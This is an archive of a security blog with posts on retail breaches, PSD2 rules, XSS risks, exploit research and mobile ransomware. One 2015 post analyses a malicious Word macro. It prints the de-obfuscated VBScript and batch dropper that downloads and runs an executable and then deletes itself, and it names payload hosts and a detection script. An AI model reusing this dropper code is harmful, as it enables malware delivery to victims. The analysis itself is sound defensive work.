
Posts Tagged ‘security’

OMG, I use that site!

November 20, 2019

In what is clearly becoming so sad it is now funny, another popular online store was hijacked. Macy’s fell victim to a third-party inclusion vulnerability and, like so many big retailers before them, some of you may be victims of the scourge of the Magecart gang.

Not even the FBI can help these retailers (or more likely they don’t listen or don’t care) as more and more of them unwittingly become infected.

Cybersecurity is now becoming the most important thing to worry about as a service provider AND as an online shopper. Be careful where you tread…

More details are available from Bleeping Computer.

Categories: General

New European rules for mobile banking apps coming to a device near you…

July 26, 2019

The world is clearly a better place now that we carry computers in our back pockets, but we need an increase in security measures for payment transactions and therefore we will require an increase in regulation, such as the PSD2 from the European Commission.

The Payment Services Directive mandates compliance by September 2019 and aims to regulate banks, payment service providers and electronic payments to include security features to protect consumers across digital channels. The PSD2 legislation will require financial services in the European Union (EU) to contribute to a more integrated, secure, and efficient payments ecosystem.

The PSD2 directive requires financial institutions to:

  • Provide/Implement a monitoring mechanism in their apps to detect/report signs of malware.
  • Provide security measures in their app to mitigate risk for the user device.
  • Ensure consumers have a secure environment to execute their financial transactions.

In Article 2 and Article 9 of the directive, PSD2 highlights Strong Customer Authentication (SCA) and Safe Execution Environment (SEE), which require de-risking across various threat vectors impacting mobile apps.

These include detecting compromised devices (e.g., jailbroken or rooted), unsafe environments (such as a fake or malicious Wi-Fi network), as well as malware and vulnerabilities within the application execution environment. PSD2 also includes RTS (Regulatory Technical Standards), which are regulatory requirements set by the European Banking Authority (EBA) to ensure that payments across the EU are secure, fair and efficient.

To meet these requirements, financial institutions should add strong security capabilities like binary protections to their mobile apps. These controls are designed to protect against known and unknown threats on users’ devices.

Mobile banking apps should also be able to detect when they are installed on risky devices and consider restricting access to high-value banking services until those risks have been remediated.

Categories: Mobile, security

Web servers are still vulnerable…

April 28, 2018

In a survey published by Stack Overflow, an often-referenced support site for developers, JavaScript was recently confirmed as the most popular programming language for the 6th year in a row. Almost 70% of the respondents claim that they visit searching for help on this subject, so it may not come as a surprise that JavaScript is also the primary cause of vulnerabilities on websites today.

In a great article on its blog, PortSwigger, the vendor that brings us one of the most popular tools for hacking websites and finding vulnerabilities, details a number of methods that can be used to abuse JavaScript and to bypass the cross-site scripting mitigations in most frameworks.

There are thousands of ways that can be used to bypass XSS protections in websites, and web developers should already know this. XSS is the number one method to compromise a browser which, in combination with privilege escalation, can allow an attacker to take over your computer. Even script kiddies can capture session tokens or cookies from websites without proper security controls, and these can be used to log in as you without even knowing your password. Here is a list of the risks in order of importance for an attacker:

  1. Account hijacking
  2. Credential stealing
  3. Sensitive Data Leakage
  4. Drive by Downloading
  5. Keyloggers/Scanners
  6. Vandalism

Don’t ignore these risks on your websites, public facing or not. If you log in to a website often in your organization and it is vulnerable to cross-site scripting, teach your users how to identify security risks that could be used to harvest credentials and expose them to malicious attacks. You may also want to make sure that your sites are tested to ensure they are not vulnerable to this type of attack. With phishing attacks being the number one method that pentesters use to gain access to your organization, XSS is the primary method being used.

Categories: security, Work related

Exploits are Everywhere

October 15, 2016

I recently went through and completed what I consider to be the hardest and most informative technical course and examination out there, the GIAC Exploit Researcher and Advanced Penetration Tester, known as GXPN. What I learned was that there is a lot of opportunity for the bad guys to get control.

As a white-hat hacker, I am asked to engage in a variety of activities, most of which are network related. For some of the hackers out there, your goal is to utilize a wide variety of tools to identify weaknesses in the defenses and/or the applications that are running and to overcome the controls in place to protect the data.

To some of the security researchers out there, exploit writing is the next logical step. As an attacker, if you are fixated on a target and you have exhausted all of your tools and tricks, you are left with little else but to find some type of vulnerability and write an exploit for it. As we purchase and add more and more items to our digital world, the odds are stacked in favour of the bad guy.

Many people have surmised that we are finding so many bugs now because programmers are making so many mistakes, but I disagree. I feel that we are finding so many bugs because there ARE so many bugs. Some of us just got better at finding them.

Let’s take the recent SSL vulnerability that was exposed for many of the Internet of Things (IoT) devices (https://www.wired.com/2016/10/akamai-finds-longtime-security-flaw-2-million-devices/). Akamai researchers would have you believe that this is somehow a recent find, but there are references to the dangers of SSH port forwarding from over a decade ago (http://www.informit.com/articles/article.aspx?p=602977).

Earlier in 2016 we had reports that the GNU libc shared library has a critical vulnerability (https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html). Admittedly this is very hard to exploit, but as more and more people learn how to look for these types of bugs, we are going to find out about them.

My recent certification has taught me that bugs are everywhere: in the mobile devices we carry, in our cars, in our thermostats. We just have to get better at looking for them.

A word to the wise: learn about all the electronics you own, keep them up to date if they are recent purchases and be prepared to give them up if they are not. As a pentester, I am looking for older vulnerable devices that are connected to your Wi-Fi or cabled networks at home or in the office as a bulkhead to allow me to get a foothold. There has never been a better time to discard those older routers and VoIP phones.

Categories: Work related

Received a Word file from someone – how bad could it be if you open it?

August 20, 2015

It used to be that files that were executable (like .com, .exe, .zip, .vbs, etc.) were bad to open when you received them in your email. Then came the pictures or URLs you received in your email, because mail clients like Outlook would automatically preview them, which results in running them without opening the email. But how bad could it be to open a Word document?

I wanted to spend a little time diving into what you might find circulating around now…

I received a Word document from an unknown sender, so rather than opening the document I loaded it on a diagnostic Linux server to see what is inside this document. (The concern is not for anything that is saved in the body of the document itself but rather the macros that come with the document.) ALERT – Geek stuff to follow…

As you view the code you may notice that someone has tried to obfuscate the code. This is evident by viewing some of the names of the functions and is common for developers who wish to make reverse engineering difficult.

[Image: Module1]

This Visual Basic module creates the subroutine that will be executed, with a loop that continues to run (while true). It also creates a function that may be used to find the temp directory (Environ()).

There is also a module that is responsible for creating the ‘work’ script and runs or executes the code.

[Image: Module2]

Below we see that the attackers are beginning to think smarter not harder. This URL uses a 302 redirect to re-establish the connection over a secure TLS channel to the same host. SSL traffic cannot be sniffed as easily so this is another attempt to obfuscate the traffic.

[Image: TCP redirect]

Finally, after the third macro is run, we have a connection to a website called mirai2000.com which starts the exploit. I have tried to un-obfuscate the connection by replacing the variables to come up with the following script:

' VBScript stage: fetch a file over HTTP and write it to disk
strTecation = "pioneer9.exe"
frgea = "MSXML2.ServerXMLHTTP"
Set objXMLHTTP = CreateObject(frgea)
' paytina is the request URL; its assignment is not part of this excerpt
objXMLHTTP.open "GET", paytina, False
objXMLHTTP.send()
ahdjqg = "ADODB.Stream"
Set objADOStream = CreateObject(ahdjqg)
objADOStream.Open
objADOStream.Type = 1 ' 1 = binary stream
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile strTecation
objADOStream.Close
$$
@echo off
REM Batch stage: run the VBScript, start the saved file, then delete both helper files
:nqdjwkn
cscript.exe pioneercranberry.vbs
ping 2.2.1.1 -n 4
:windows
pioneer9.exe
:loop
ping 1.3.1.2 -n 1
del pioneercranberry.vbs
del pioneercranberry.bat
REM Repeat the delete until neither helper file remains
if exist pioneercranberry.bat goto loop
if exist pioneercranberry.vbs goto loop
exit

Analysis:

We see a script that is downloaded as pioneercranberry.vbs (GET /777763172631572.txt from mirai2000.com).

We then download a second file (GET /rara.txt), which downloads a file from Dropbox (https://www.dropbox.com/s/x3igq1hnugevjp0/3d8.exe?dl=1) that appears to be a Windows firewall shell(?), and save it as an executable (pioneer9).

When the file (pioneercranberry.vbs) is run we see a few ping requests to an IP address (2.2.1.1) in France (IP2000-ADSL-BAS).

Next we download an executable (Trojan) from an IP address (66.240.183.19) on the onx.com network using SSL.

Finally we send a single ping to an IP address (1.3.1.2) in China (CHINANET-GD)…hmmm.

I also see evidence of a TeamViewer executable being downloaded (perhaps part of the Trojan above) from an IP address (178.255.155.118) in Italy (ANEXIA-NET), but it fails to run because of a license issue.
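The kind of static check an analyst could run over macro text recovered this way, as an added example that is not part of the original post: it resolves simple string assignments so that indirect calls such as CreateObject(frgea) are still recognised. The tag names and rule set are assumptions, and the sample is condensed from the script quoted above.

```python
import re

# Constructed sample: condensed from the de-obfuscated script quoted in the post.
SAMPLE = '''strTecation = "pioneer9.exe"
frgea ="MSXML2.ServerXMLHTTP"
Set objXMLHTTP = CreateObject(frgea)
objXMLHTTP.open "GET", paytina, False
ahdjqg = "ADODB.Stream"
Set objADOStream = CreateObject(ahdjqg)
objADOStream.SaveToFile strTecation
cscript.exe pioneercranberry.vbs
ping 2.2.1.1 -n 4
del pioneercranberry.vbs
'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
EXEC_EXT = (".exe", ".scr", ".com")

def triage(text):
    """Return a sorted list of behaviour tags (assumed names) found in macro text."""
    lines = text.splitlines()
    # Pass 1: collect `name = "literal"` assignments so a ProgID or file name
    # hidden behind a meaningless variable name can be resolved in pass 2.
    consts = {m.group(1).lower(): m.group(2) for m in map(ASSIGN.match, lines) if m}
    def resolve(token):
        token = token.strip().strip('"')
        return consts.get(token.lower(), token)
    tags = set()
    for line in lines:
        m = re.search(r'CreateObject\(([^)]+)\)', line, re.I)
        if m:
            progid = resolve(m.group(1)).lower()
            if "xmlhttp" in progid:
                tags.add("http-download")
            if progid == "adodb.stream":
                tags.add("binary-stream")
        m = re.search(r'\.SaveToFile\s+([^,\s]+)', line, re.I)
        if m and resolve(m.group(1)).lower().endswith(EXEC_EXT):
            tags.add("writes-executable")
        if re.match(r'\s*(cscript|wscript)(\.exe)?\s+\S+\.vbs', line, re.I):
            tags.add("runs-script-host")
        if re.match(r'\s*ping\s+\S+\s+-n\s+\d+', line, re.I):
            tags.add("ping")
        if re.match(r'\s*del\s+\S+\.(vbs|bat)\b', line, re.I):
            tags.add("self-delete")
    return sorted(tags)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The combination of http-download, binary-stream and writes-executable in one document is the download-and-save pattern described in the analysis; any single tag on its own is weak evidence.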

——————————–

All of this activity because I opened a Microsoft Word document. All carefully obfuscated to evade Virus protection and Application level proxies and filters.

Sophos labels this Trojan as Troj/Agent-AOHW. Unfortunately as of this morning the site no longer works so I am unable to complete my analysis.

The moral of this story is…be careful when dealing with ANY file attachment in email. A good rule of thumb is if you didn’t ask for it DON’T open it.

Categories: General

It’s the FBI and we have your phone surrounded…

August 14, 2015

Just when you thought it was safe to use your Android smartphone, there are several vulnerabilities you should be aware of (great, now I need to monitor and patch my cell phones too? – yes Virginia, just one more thing you need to do this week).

There are reported connections from a Command and Control server (C2) located in Canada and Germany for a new ransomware for your phone that impersonates the FBI. Claiming that it detected pornographic images on your phone, this message asks you to pay a fine of $500, and as proof it shows you a picture of yourself (taken with a front-facing camera) and the Internet IP address of the phone (everyone has a data plan nowadays, right?).

Using a hidden feature of your phone, it can wake your device out of idle and report in to a C2 every minute without any sign that it is doing so (you might be noticing that your battery life has gotten quite poor, this would probably require additional power). It will also give the attackers a way to connect to your device using a backdoor.

Read more about it here – http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises

Edit: This is just another variant of the same ransomware family reported earlier this year. (See here). Unfortunately there is no antivirus for mobile phones that has heuristic scanning, so don’t rely on anything you have installed to protect you from these types of attacks.

Categories: General

Security industry reacts to Oracle’s CSO missive | CSO Online

August 13, 2015

Ever wonder where we will all be in 5 or 10 years? I would never have seen this coming – I mean this could be an example of professional hubris – read about how the chief security officer at Oracle thought it was time to tell its users to play nicely or ‘we will take our wagon away from you’.

This is just a glimpse of the next version of the end user license agreement (EULA) that we all just click on before using the software that it was written for. Judging from the industry reaction it could be a little ways off before a large company like Oracle tries to flex its muscles, but mark my words, reverse engineering software to find holes will likely lead us back to a time before open source. Companies should embrace the open architecture and provide a rich ‘bug bounty’ program if they do not have the talent in-house to keep up with demand.

Read more on the article below and check out the archive of the post before it was pulled off the site.

http://www.csoonline.com/article/2970226/application-security/security-industry-reacts-to-oracles-cso-missive.html

Categories: General